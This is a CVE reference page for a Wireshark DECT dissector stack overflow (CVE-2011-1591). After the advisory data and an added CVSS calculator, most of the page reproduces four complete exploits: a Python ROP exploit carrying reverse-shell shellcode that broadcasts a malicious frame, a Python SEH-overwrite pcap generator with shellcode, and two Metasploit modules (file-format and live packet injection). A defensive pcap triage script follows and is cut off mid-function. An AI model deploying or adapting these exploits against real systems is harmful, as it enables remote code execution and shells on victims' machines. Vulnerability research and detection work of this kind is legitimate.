CVE-2011-1591 : Detail

Category : Overflow
83.33% V3
Attack vector : Network
Published : 2011-04-29 20h00 +00:00
Last modified : 2017-09-18 10h57 +00:00

CVE Description

Stack-based buffer overflow in the DECT dissector in epan/dissectors/packet-dect.c in Wireshark 1.4.x before 1.4.5 allows remote attackers to execute arbitrary code via a crafted .pcap file.

CVE Information

Related Weaknesses

CWE-ID    Weakness Name                                                              Source
CWE-119   Improper Restriction of Operations within the Bounds of a Memory Buffer

CWE-119: The product performs operations on a memory buffer, but it reads from or writes to a memory location outside the buffer's intended boundary. This may result in read or write operations on unexpected memory locations that could be linked to other variables, data structures, or internal program data.

Metrics

Metrics   Score   Severity   CVSS Vector                      Source
V2        9.3     High       AV:N/AC:M/Au:N/C:C/I:C/A:C       nvd@nist.gov
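The vector above is what produces the 9.3. As an added example (not code from this database or from NVD), the following CVSS v2.0 base-score calculator implements the published v2 equations and weights, reproduces 9.3 from the vector NVD assigned to CVE-2011-1591, and maps the result to NVD's v2 severity bands (Low 0.0-3.9, Medium 4.0-6.9, High 7.0-10.0). The other vector strings used in the usage line and tests are constructed inputs.

```python
"""CVSS v2.0 base score from a base vector string (added example, not from the CVE database)."""

# CVSS v2.0 base metric weights, as published in the CVSS v2 specification.
AV_WEIGHT = {"L": 0.395, "A": 0.646, "N": 1.0}     # Access Vector: Local / Adjacent / Network
AC_WEIGHT = {"H": 0.35, "M": 0.61, "L": 0.71}      # Access Complexity: High / Medium / Low
AU_WEIGHT = {"M": 0.45, "S": 0.56, "N": 0.704}     # Authentication: Multiple / Single / None
CIA_WEIGHT = {"N": 0.0, "P": 0.275, "C": 0.660}    # C / I / A impact: None / Partial / Complete

WEIGHTS = {"AV": AV_WEIGHT, "AC": AC_WEIGHT, "Au": AU_WEIGHT,
           "C": CIA_WEIGHT, "I": CIA_WEIGHT, "A": CIA_WEIGHT}


def parse_vector(vector):
    """Split 'AV:N/AC:M/...' into a dict, rejecting unknown metrics, bad values and omissions."""
    metrics = {}
    for part in vector.split("/"):
        name, _, value = part.partition(":")
        if name not in WEIGHTS:
            raise ValueError("unknown CVSS v2 base metric %r" % name)
        if value not in WEIGHTS[name]:
            raise ValueError("bad value %r for metric %s" % (value, name))
        metrics[name] = value
    missing = [m for m in WEIGHTS if m not in metrics]
    if missing:
        raise ValueError("vector missing %s" % ", ".join(missing))
    return metrics


def cvss2_base(vector):
    """Return the CVSS v2.0 base score (one decimal) for a base vector.

    BaseScore = round_1((0.6*Impact + 0.4*Exploitability - 1.5) * f(Impact))
    Impact          = 10.41 * (1 - (1-C)(1-I)(1-A))
    Exploitability  = 20 * AV * AC * Au
    f(Impact)       = 0 if Impact == 0 else 1.176
    """
    m = parse_vector(vector)
    impact = 10.41 * (1 - (1 - CIA_WEIGHT[m["C"]]) * (1 - CIA_WEIGHT[m["I"]]) * (1 - CIA_WEIGHT[m["A"]]))
    exploitability = 20 * AV_WEIGHT[m["AV"]] * AC_WEIGHT[m["AC"]] * AU_WEIGHT[m["Au"]]
    f_impact = 0.0 if impact == 0 else 1.176
    return round(((0.6 * impact) + (0.4 * exploitability) - 1.5) * f_impact, 1)


def severity_v2(score):
    """NVD severity bands for CVSS v2 scores."""
    if score >= 7.0:
        return "High"
    if score >= 4.0:
        return "Medium"
    return "Low"


if __name__ == "__main__":
    # The vector NVD assigned to CVE-2011-1591, followed by a constructed comparison vector.
    for v in ("AV:N/AC:M/Au:N/C:C/I:C/A:C", "AV:L/AC:L/Au:N/C:P/I:P/A:P"):
        s = cvss2_base(v)
        print("%s -> %.1f (%s)" % (v, s, severity_v2(s)))
```

The AC:M (0.61) in this vector is what keeps the score at 9.3 rather than 10.0: a remote, unauthenticated, complete-impact bug with AC:L scores the maximum. NVD rated it Medium complexity because the victim has to open the crafted capture or be on a segment where the attacker can inject the frame.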

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile ranks CVEs by their EPSS score. For example, a CVE in the 95th percentile is more likely to be exploited than 95% of all other CVEs. The percentile is therefore the way to compare one CVE's EPSS score against the rest.

Exploit information

Exploit Database EDB-ID : 18145

Publication date : 2011-11-21 23h00 +00:00
Author : ipv
EDB Verified : No

#!/usr/bin/env python
# -*- coding: iso-8859-15 -*-
a = """
\t-- CVE: 2011-1591 : Wireshark <= 1.4.4 packet-dect.c dissect_dect() --
#
# -------- Team : Consortium-of-Pwners
# -------- Author : ipv
# -------- Impact : high
# -------- Target : Archlinux wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
# -------- Description
#
# This code exploits a remote stack based buffer overflow in the DECT dissector of
# wireshark. ROP chains aims to recover dynamically stack address, mprotect it and stack pivot to
# shellcode located the payload.
# All the process is automated, and bypass any NX/ALSR.
#
# Operating Systems tested : [see the summary] with scapy >= 2.5
# For any comments, remarks, news, please mail me : ipv _at_ [team] . net
###########################################################################
"""

import sys, struct

if sys.version_info >= (2, 5):
    from scapy.all import *
else:
    from scapy import *


# align: pack a 32-bit little-endian address
def _x(v):
    return struct.pack("<I", v)


# Gadget Table - Arch linux v2010.05 default package
#   - wireshark-cli-1.4.3-1-i686.pkg.tar.xz
#   - wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
arch_rop_chain = [
    # Safe SEIP overwrite
    _x(0x8069acb),                  # pop ebx ; pop esi ; pop ebp
    _x(0), _x(0x80e9360), _x(0),    # fake (arg1, arg2, arg3), to avoid crash
    # mprotect 1st arg : stack & 0xffff0000
    _x(0x8067d90),                  # push esp ; pop ebp
    _x(0x8081f2e),                  # xchg ebp eax
    _x(0x80f9d7f),                  # xchg ecx, eax
    _x(0x8061804),                  # pop eax
    _x(0xffff0000),                 #
    _x(0x80c69f0),                  # xchg edi, eax
    _x(0x80ff067),                  # and ecx edi ; dec ecx
    _x(0x8077c53),                  # inc ecx ; sub al 0x5d
    _x(0x8061804),                  # pop eax
    _x(0x7f16a5d0),                 # avoid crash with dec dword [ecx-0x76fbdb8c]
    _x(0x8048360),                  # xchg ecx eax
    _x(0x8089f46),                  # xchg edx eax ; std ; dec dword [ecx-0x76fbdb8c]
    _x(0x8067d90),                  # push esp ; pop ebp
    _x(0x8081f2e),                  # xchg ebp eax
    _x(0x8067d92) * 7,              # ret
    # 1st arg of mprotect is on esp+48 address (see below)
    _x(0x80745f9),                  # mov [eax+0x50] edx ; pop ebp
    _x(0),
    # we search address of mprotect (@mprotect = @fopen + 0x6fe70)
    _x(0x8065226),                  # pop eax
    _x(0x81aca20 - 0xc),            # got[fopen]
    _x(0x8074597),                  # mov eax [eax+0xc]
    _x(0x8048360),                  # xchg ecx eax
    _x(0x8065226),                  # pop eax
    _x(0x6fe70),
    _x(0x8081f2e),                  # xchg ebp eax
    _x(0x806973d),                  # add ecx ebp
    _x(0x08104f61),                 # jmp *%ecx
    _x(0x0811eb63),                 # pop ebx, pop esi, pop edi
    # mprotect args (base_addr, page size, mode)
    _x(0),                          # Stack Map that is updated dynamically (see upper)
    _x(0x10000),                    # PAGE size 0x1000
    _x(0x7),                        # RWX Mode
    # now we can jump to our lower addressed shellcode by decreasing esp register
    _x(0x8061804),                  # pop eax
    _x(0xff + 0x50),                # esp will be decreased of 0xff + 0x50 bytes;
    _x(0x80b8fc8),                  # xchg edi eax
    _x(0x8067d90),                  # push esp ; pop ebp
    _x(0x80acc63),                  # sub ebp, edi ; dec ecx
    _x(0x8081f2e),                  # xchg ebp eax
    _x(0x0806979e),                 # jmp *eax
]

# Gadget Table - Bt4 compiled without SSP/FortifySource
#   Source wireshark 1.4.3
labs_rop_chain = [
    # Safe SEIP overwrite
    _x(0x08073fa1),                 # pop ebx ; pop esi ; pop ebp
    _x(0), _x(0x0808c4d3), _x(0),   # fake (arg1, arg2, arg3), to avoid crash
    # sys_mprotect : eax=125(0x7D) ; ebx=address base ; ecx = size page ; edx = mode
    # mprotect 3rd arg
    _x(0x080e64cf),                 # pop edx ; pop es ; add cl cl
    _x(0x7), _x(0x0),               # RWX mode 0x7
    # mprotect 1st arg (logical AND with stack address to get address base),
    _x(0x080a1711),                 # mov edi esp ; dec ecx
    _x(0x0815b74f),                 # pop ecx
    _x(0xffff0000),                 #
    _x(0x0804c73c),                 # xchg ecx eax
    _x(0x080fadd7),                 # and edi eax ; dec ecx
    _x(0x0804c73c),                 # xchg ecx eax
    _x(0x080af344),                 # mov ebx edi ; dec ecx
    # mprotect 2nd arg
    _x(0x0815b74f),                 # pop ecx
    _x(0x10000),                    # PAGE size 0x10000
    # int 0x80 : here vdso is not randomized, so, we use it!
    _x(0x80d8b71),                  # pop eax
    _x(0x7D),                       # 0x7D = mprotect syscall
    _x(0x804e6df),                  # pop *esi
    _x(0xffffe411),                 # int 0x80
    # _x(0xffffe414),               # @sysenter in .vdso
    _x(0x080ab949),                 # jmp *esi
    # now we can jump to our lower addressed shellcode by decreasing esp register
    _x(0x0815b74f),                 # pop ecx
    _x(256),                        # esp will be decreased of 256bytes
    _x(0x080a1711),                 # mov edi esp ; dec ecx
    _x(0x081087d3),                 # sub edi ecx ; dec ecx
    _x(0x080f7cb1),                 # jmp *edi
]

addr_os = {
    # ID : [ OS, STACK SIZE, GADGET TABLE ]
     1 : ["Arch Linux 2010.05   ", 0xb9, arch_rop_chain],  # wireshark-gtk-1.4.3-1-i686.pkg.tar.xz
     2 : ["Labs test            ", 0xbf, labs_rop_chain],
    -1 : ["Debian 5.0.8 Lenny   ", -3, False],             # wireshark_1.0.2-3+lenny12_i386.deb
    -2 : ["Debian 6.0.2 Squeeze ", -1, False],             # wireshark_1.2.11-6+squeeze1_i386.deb
    -3 : ["Fedora 14            ", -1, False],             # wireshark-1.4.3-1.2.2.i586.rpm
    -4 : ["OpenSuse 11.3        ", -1, False],             # wireshark-1.4.3-1.2.2.i586.rpm
    -5 : ["Ubuntu 10.10 | 11.04 ", -1, False],             #
    -6 : ["Gentoo *             ", -2, False],             #
}

print a


def usage():
    print "Please select an ID >= 0 :\n"
    print " ID   TARGET                    INFO"
    print "--------------------------------------------------------------------"
    for i in addr_os.iteritems():
        print " %2d -- %s " % (i[0], i[1][0]),
        if i[1][1] == -1:
            print "Default package uses LibSSP & Fortify Source"
        elif i[1][1] == -2:
            print "Compiled/Build with Fortify Source"
        elif i[1][1] == -3:
            print "DECT protocol not supported"
        else:
            print "VULN -> Stack size %d" % (i[1][1])
    sys.exit(1)


if len(sys.argv) == 1:
    usage()
elif addr_os.has_key(int(sys.argv[1])) is False:
    usage()
elif int(sys.argv[1]) < 0:
    usage()

target = addr_os[int(sys.argv[1])]
print "\n[+] Target : %s" % target[0]

rop_chain = "".join([rop for rop in target[2]])

# msfpayload linux/x86/shell_reverse_tcp LHOST=127.0.0.1 C
rev_tcp_shell = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x7f\x00\x00\x01\x66\x68\x11\x5c\x66\x53\x6a\x10\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"

# number of bytes from the start of the payload to the saved EIP on this target
SEIP_SMASH = target[1]
print "\t[+] Length for smashing SEIP : 0x%x(%d)" % (SEIP_SMASH, SEIP_SMASH)

nopsled = "\x90"
head_nop = 50
# NOP sled + reverse shell + NOP padding exactly fills the distance to the saved EIP,
# the ROP chain then starts at the return address slot
shellcode = nopsled * head_nop + rev_tcp_shell + nopsled * (SEIP_SMASH - len(rev_tcp_shell) - head_nop)
payload = shellcode + rop_chain

# stack alignment
if (len(payload) % 2):
    diff = len(payload) % 2
    payload = payload[(2 - diff):]

print "\t[+] Payload length : %d" % len(payload)

# ethertype 0x2323 is what makes Wireshark hand the frame to the DECT dissector
evil_packet = Ether(type=0x2323, dst="ff:ff:ff:ff:ff:ff") / payload
# evil_packet.show()
print "\t[+] Evil packet length : %d" % len(evil_packet)
print "\t[+] Sending packet to broadcast"
sendp(evil_packet)

Exploit Database EDB-ID : 17185

Publication date : 2011-04-17 22h00 +00:00
Author : sickness
EDB Verified : Yes

#!/usr/bin/env python
# Vulnerable app: Wireshark 1.4.1-1.4.4
# Author: sickness
# Download :
# OS: Tested it on Windows XP SP2 and SP3 but it should work on every Windows with DEP off (still working on a ROP exploit)
# DATE : 17.04.2011
# Fixed in latest version 1.4.5
# DO NOT FORGET TO FEEL THE PWNSAUCE WITH: http://redmine.corelan.be:8800/projects/pvefindaddr
###################################################################
# Offset might change!
# Watch out for other bad chars!!
# Current bad chars: \x00\x0a\x0d\x09
###################################################################
# References:
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836
# https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838
###################################################################
import sys
from scapy.all import *

# payload=calc.exe
shellcode = "\x33\xc9\x83\xe9\xce\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x17\x22\xfd\x6a\x83\xee\xfc\xe2\xf4\xeb\xca\x74\x6a\x17\x22\x9d\xe3\xf2\x13\x2f\x0e\x9c\x70\xcd\xe1\x45\x2e\x76\x38\x03\xa9\x8f\x42\x18\x95\xb7\x4c\x26\xdd\xcc\xaa\xbb\x1e\x9c\x16\x15\x0e\xdd\xab\xd8\x2f\xfc\xad\xf5\xd2\xaf\x3d\x9c\x70\xed\xe1\x55\x1e\xfc\xba\x9c\x62\x85\xef\xd7\x56\xb7\x6b\xc7\x72\x76\x22\x0f\xa9\xa5\x4a\x16\xf1\x1e\x56\x5e\xa9\xc9\xe1\x16\xf4\xcc\x95\x26\xe2\x51\xab\xd8\x2f\xfc\xad\x2f\xc2\x88\x9e\x14\x5f\x05\x51\x6a\x06\x88\x88\x4f\xa9\xa5\x4e\x16\xf1\x9b\xe1\x1b\x69\x76\x32\x0b\x23\x2e\xe1\x13\xa9\xfc\xba\x9e\x66\xd9\x4e\x4c\x79\x9c\x33\x4d\x73\x02\x8a\x4f\x7d\xa7\xe1\x05\xc9\x7b\x37\x7d\x23\x70\xef\xae\x22\xfd\x6a\x47\x4a\xcc\xe1\x78\xa5\x02\xbf\xac\xd2\x48\xc8\x41\x4a\x5b\xff\xaa\xbf\x02\xbf\x2b\x24\x81\x60\x97\xd9\x1d\x1f\x12\x99\xba\x79\x65\x4d\x97\x6a\x44\xdd\x28\x09\x76\x4e\x9e\x44\x72\x5a\x98\x6a"

# ppr is from a non-ASLR enabled wireshark module
buf  = "\x41" * 1239            # padding up to the SEH record
buf += "\xeb\x06\x90\x90"       # nSEH: short jmp 6 bytes forward, over the handler address
buf += "\x5D\x10\x94\x62"       # SEH: pop/pop/ret at 0x6294105D
buf += "\x90" * 16              # NOP slide into the shellcode
buf += shellcode
buf += "\x90" * 4500            # keep writing past the buffer so the exception fires

# ethertype 0x2323 routes the frame to the DECT dissector
evil = Ether(type=0x2323) / buf
wrpcap("evil.pcap", evil)
print "\n"
print "Evil .pcap file created!"
print "It's pwnsauce time!\n"

Exploit Database EDB-ID : 17186

Publication date : 2011-04-18 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: wireshark_packet_dect.rb 12364 2011-04-19 07:53:58Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Wireshark <= 1.4.4.
        When opening a malicious .pcap file in Wireshark, a stack buffer overflow
        occurs, resulting in arbitrary code execution. This exploit bypasses
        DEP & ASLR and works on XP, Vista & Windows 7.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'sickness',      # found the vulnerability
          'corelanc0d3r'   # rop exploit + msf module
        ],
      'Version'        => '$Revision: 12364 $',
      'References'     =>
        [
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ],
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/17185' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 936,
          'DisableNops' => 'True',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ '32-bit Windows Universal (Generic DEP & ASLR Bypass)',
            {
              'OffSet' => 1243,
              'Ret'    => 0x667c484d, # libgnutl pivot - tx Lincoln
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 18 2011',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'pcap file', 'passwords.pcap']),
      ], self.class)
  end

  # random 32-bit value for registers whose contents do not matter
  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}' file ...")

    # classic libpcap global header, little-endian
    global_header  = "\xd4\xc3\xb2\xa1"  # magic_number
    global_header << "\x02\x00"          # major version
    global_header << "\x04\x00"          # minor version
    global_header << "\x00\x00\x00\x00"  # GMT to local correction
    global_header << "\x00\x00\x00\x00"  # accuracy
    global_header << "\xff\x7f\x00\x00"  # snaplen
    global_header << "\x01\x00\x00\x00"  # data link type (Ethernet)

    # one record header
    packet_header  = "\x26\x32\xac\x4d"  # timestamp seconds
    packet_header << "\xda\xfa\x00\x08"  # timestamp microseconds
    packet_header << "\x04\x06\x00\x00"  # nr of octets of packet in file
    packet_header << "\x04\x06\x00\x00"  # actual size of packet (1540)

    # Ethernet header: broadcast dst, zero src, ethertype 0x2323 (DECT)
    ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23"

    print_status("Preparing payload")
    pivot = [target.ret].pack('V')

    # pvefindaddr rop 'n roll
    # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below
    rop_pivot = [
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x64f9d5ec,  # ADD ESP,0C # RET - libfontconfig-1.dll
      0x618d7d0e,  # RET <- don't count on this one !
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x61C14268,  # ADD ESP,24 # RETN - freetype6.dll
      0xFFFFFFFF,  # crash baby !
      0xFFFFFFFF,
      0xFFFFFFFF,
      0xFFFFFFFF,
      0xFFFFFFFF,
      0x618d7d0e,
      0x618d7d0e,
      0x618d7d0e,
      0x618d7d0e,
    ].pack("V*")

    rop_gadgets = [
      0x6d7155cb,  # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll]
      junk,
      0x6d596e31,  # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll]
      junk,
      junk,
      0x61c14552,  # POP EBX # RETN ** [freetype6.dll]
      0x00000800,  # size - 0x800 should be more than enough
      0x61c14043,  # POP ESI # RETN ** [freetype6.dll]
      0x0000009C,
      0x6d58321a,  # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll]
      junk,
      junk,
      0x68610a27,  # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll]
      0x629445a6,  # POP EAX # RETN ** [libatk-1.0-0.dll]
      0x62d9027c,  #
      0x6c385913,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll]
      0x617bc526,  # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll]
      0x64f8c692,  # POP EDX # RETN ** [libfontconfig-1.dll]
      0x00000040,  #
      0x619638db,  # POP ECX # RETN ** [libgtk-win32-2.0-0.dll]
      0x6536B010,  # RW
      0x618d7d0d,  # POP EDI # RETN ** [libgtk-win32-2.0-0.dll]
      0x618d7d0e,  # RET
      0x64fa0c15,  # POP EAX # RETN ** [libfontconfig-1.dll]
      0x618d7d0e,  # RET
      0x61963fdb,  # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll]
    ].pack("V*")

    pivot = [target.ret].pack('V')

    buffer  = rand_text(131)
    buffer << rop_pivot
    buffer << rop_gadgets
    nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length))
    buffer << nops
    buffer << payload.encoded
    buffer << pivot
    filler = 1540 - buffer.length
    buffer << rand_text(filler)

    filecontent  = global_header
    filecontent << packet_header
    filecontent << ptype
    filecontent << buffer

    print_status("Writing payload to file, " + filecontent.length.to_s() + " bytes")
    file_create(filecontent)
  end
end

Exploit Database EDB-ID : 17195

Publication date : 2011-04-18 22h00 +00:00
Author : Metasploit
EDB Verified : Yes

##
# $Id: wireshark_packet_dect.rb 12371 2011-04-19 16:41:58Z sinn3r $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GoodRanking

  include Msf::Exploit::Remote::Capture

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Wireshark <= 1.4.4 packet-dect.c Stack Buffer Overflow (remote)',
      'Description'    => %q{
          This module exploits a stack buffer overflow in Wireshark <= 1.4.4
        by sending a malicious packet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Paul Makowski',  # Initial discovery
          'sickness',       # proof of concept
          'corelanc0d3r',   # rop exploit + msf module
        ],
      'Version'        => '$Revision: 12371 $',
      'References'     =>
        [
          [ 'CVE', '2011-1591'],
          [ 'OSVDB', '71848'],
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5838' ],
          [ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=5836' ],
          [ 'URL', 'http://www.exploit-db.com/exploits/17185' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'       => 936,
          'DisableNops' => 'True',
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Win32 Universal (Generic DEP & ASLR Bypass)',
            {
              'OffSet' => 1243,
              'Ret'    => 0x667c484d, # libgnutl pivot - tx Lincoln
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Apr 18 2011',
      'DefaultTarget'  => 0))

    register_options([
      OptBool.new('LOOP',  [true, 'Send the packet every X seconds until the job is killed', false]),
      OptInt.new('DELAY',  [true, 'This option sets the delay between sent packets', 5])
    ], self.class)

    register_advanced_options([
      OptBool.new("ExitOnSession", [ false, "Return from the exploit after a session has been created", true ]),
    ], self.class)

    deregister_options('FILTER','PCAPFILE','RHOST','SNAPLEN','TIMEOUT','UDP_SECRET','NETMASK','GATEWAY')
  end

  # random 32-bit value for registers whose contents do not matter
  def junk
    return rand_text(4).unpack("L")[0].to_i
  end

  def exploit
    # Ethernet header: broadcast dst, zero src, ethertype 0x2323 (DECT)
    ptype = "\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x23\x23"

    print_status("Preparing payload")
    pivot = [target.ret].pack('V')

    # pvefindaddr rop 'n roll
    # tx dadr00p (https://twitter.com/dietersar) for testing the offsets below
    rop_pivot = [
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x64f9d5ec,  # ADD ESP,0C # RET - libfontconfig-1.dll
      0x618d7d0e,  # RET <- don't count on this one !
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x618d7d0e,  # RET
      0x61C14268,  # ADD ESP,24 # RETN - freetype6.dll
      0xFFFFFFFF,  # crash baby !
      0xFFFFFFFF,
      0xFFFFFFFF,
      0xFFFFFFFF,
      0xFFFFFFFF,
      0x618d7d0e,
      0x618d7d0e,
      0x618d7d0e,
      0x618d7d0e,
    ].pack("V*")

    rop_gadgets = [
      0x6d7155cb,  # PUSH ESP # POP EBX # POP EBP # RETN **[libpangoft2-1.0-0.dll]
      junk,
      0x6d596e31,  # MOV EAX,EBX # POP EBX # POP EBP # RETN **[libgio-2.0-0.dll]
      junk,
      junk,
      0x61c14552,  # POP EBX # RETN ** [freetype6.dll]
      0x00000800,  # size - 0x800 should be more than enough
      0x61c14043,  # POP ESI # RETN ** [freetype6.dll]
      0x0000009C,
      0x6d58321a,  # ADD EAX,ESI # POP ESI # POP EBP # RETN **[libgio-2.0-0.dll]
      junk,
      junk,
      0x68610a27,  # XCHG EAX,EBP # RETN ** [libglib-2.0-0.dll]
      0x629445a6,  # POP EAX # RETN ** [libatk-1.0-0.dll]
      0x62d9027c,  #
      0x6c385913,  # MOV EAX,DWORD PTR DS:[EAX] # ADD CL,CL # RETN ** [libgdk-win32-2.0-0.dll]
      0x617bc526,  # XCHG EAX,ESI # ADD AL,10 # ADD CL,CL # RETN ** [libgtk-win32-2.0-0.dll]
      0x64f8c692,  # POP EDX # RETN ** [libfontconfig-1.dll]
      0x00000040,  #
      0x619638db,  # POP ECX # RETN ** [libgtk-win32-2.0-0.dll]
      0x6536B010,  # RW
      0x618d7d0d,  # POP EDI # RETN ** [libgtk-win32-2.0-0.dll]
      0x618d7d0e,  # RET
      0x64fa0c15,  # POP EAX # RETN ** [libfontconfig-1.dll]
      0x618d7d0e,  # RET
      0x61963fdb,  # PUSHAD # RETN ** [libgtk-win32-2.0-0.dll]
    ].pack("V*")

    pivot = [target.ret].pack('V')

    buffer  = rand_text(131)
    buffer << rop_pivot
    buffer << rop_gadgets
    nops = make_nops(target['OffSet'] - (buffer.length) - (payload.encoded.length))
    buffer << nops
    buffer << payload.encoded
    buffer << pivot
    filler = 1500 - buffer.length
    buffer << rand_text(filler)

    pkt  = ptype
    pkt << buffer

    print_status("Sending malicious packet")
    open_pcap()
    handler
    if datastore['LOOP']
      while true
        break if session_created? and datastore['ExitOnSession']
        inject(pkt)
        select(nil, nil, nil, datastore['DELAY'])
      end
    else
      inject(pkt)
    end
    close_pcap
  end
end
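All four exploits above reach the dissector the same way: an Ethernet frame with ethertype 0x2323 carrying well over a kilobyte of payload (1239 bytes in EDB 17185 and an 'OffSet' of 1243 in the Metasploit modules just to reach the saved return address, plus the ROP chain and shellcode behind it). That makes the crafted capture easy to spot before anyone opens it. The following is an added example, not code from this page, the exploit authors or the Wireshark project: a dependency-free Python triage script that parses classic libpcap files (the same global header and record header layout the Metasploit file-format module writes), validates each record length against snaplen and the file size before trusting it, unwraps one optional 802.1Q tag, and flags DECT frames whose payload is at or above a threshold. The 1024-byte threshold, the `build_pcap` helper and the embedded sample capture are constructed for this example. A hit means "open this only in Wireshark 1.4.5 or later", not proof that the file was weaponised.

```python
"""Triage libpcap files for oversized DECT (ethertype 0x2323) frames.

Added example for CVE-2011-1591 (not from the page or the Wireshark project).
Threshold and sample capture below are constructed for the example.
"""
import struct

DECT_ETHERTYPE = 0x2323        # ethertype the public exploits use to reach packet-dect.c
ETHERTYPE_VLAN = 0x8100        # 802.1Q tag, unwrapped once below
LINKTYPE_ETHERNET = 1
PCAP_MAGIC_LE = b"\xd4\xc3\xb2\xa1"
PCAP_MAGIC_BE = b"\xa1\xb2\xc3\xd4"
# The exploits need 1239 (EDB 17185) or 1243 (Metasploit) bytes of DECT payload just to
# reach the saved return address; real DECT frames are a few tens of bytes. 1024 is an
# arbitrary but comfortable threshold chosen for this example.
SUSPICIOUS_PAYLOAD_LEN = 1024


def parse_pcap(data):
    """Parse a classic libpcap blob; return (linktype, [frame_bytes, ...]).

    Record lengths are checked against snaplen and the bytes remaining, so a
    malformed record header raises instead of slicing past the end.
    """
    if len(data) < 24:
        raise ValueError("truncated global header")
    if data[:4] == PCAP_MAGIC_LE:
        end = "<"
    elif data[:4] == PCAP_MAGIC_BE:
        end = ">"
    else:
        raise ValueError("not a libpcap file: magic %r" % data[:4])
    # version major, version minor, thiszone, sigfigs, snaplen, linktype
    _maj, _min, _tz, _sig, snaplen, linktype = struct.unpack(end + "HHiIII", data[4:24])
    frames = []
    off = 24
    while off < len(data):
        if off + 16 > len(data):
            raise ValueError("truncated record header at offset %d" % off)
        _ts_sec, _ts_usec, incl_len, _orig_len = struct.unpack(end + "IIII", data[off:off + 16])
        off += 16
        if incl_len > snaplen or off + incl_len > len(data):
            raise ValueError("record at %d claims %d bytes (snaplen %d, %d bytes left)"
                             % (off - 16, incl_len, snaplen, len(data) - off))
        frames.append(data[off:off + incl_len])
        off += incl_len
    return linktype, frames


def dect_payload(frame):
    """Return the DECT payload of an Ethernet frame, or None if the frame is not DECT."""
    if len(frame) < 14:
        return None
    ethertype = struct.unpack(">H", frame[12:14])[0]   # ethertype is big-endian on the wire
    off = 14
    if ethertype == ETHERTYPE_VLAN:
        if len(frame) < 18:
            return None
        ethertype = struct.unpack(">H", frame[16:18])[0]
        off = 18
    if ethertype != DECT_ETHERTYPE:
        return None
    return frame[off:]


def find_oversized_dect(pcap_bytes, threshold=SUSPICIOUS_PAYLOAD_LEN):
    """Return [(frame_index, payload_len), ...] for DECT frames at or above threshold."""
    linktype, frames = parse_pcap(pcap_bytes)
    if linktype != LINKTYPE_ETHERNET:
        return []   # this triage only understands Ethernet-encapsulated DECT
    hits = []
    for idx, frame in enumerate(frames):
        payload = dect_payload(frame)
        if payload is not None and len(payload) >= threshold:
            hits.append((idx, len(payload)))
    return hits


def build_pcap(frames, snaplen=0x7fff):
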